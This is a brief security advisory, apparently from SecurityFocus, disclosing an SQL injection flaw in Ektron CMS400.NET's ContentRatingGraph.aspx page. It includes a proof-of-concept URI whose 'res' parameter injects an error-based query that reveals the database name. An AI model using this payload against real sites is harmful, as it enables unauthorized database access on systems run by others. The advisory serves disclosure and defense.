Ektron CMS400.NET 'ContentRatingGraph.aspx' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/WorkArea/ContentRatingGraph.aspx?type=time&view=day&res_type=content&res=1%20and%201=convert(int,db_name())--&EndDate=5%2f10%2f2008+12%3a00%3a00+AM


 

Privacy Statement
Copyright 2010, SecurityFocus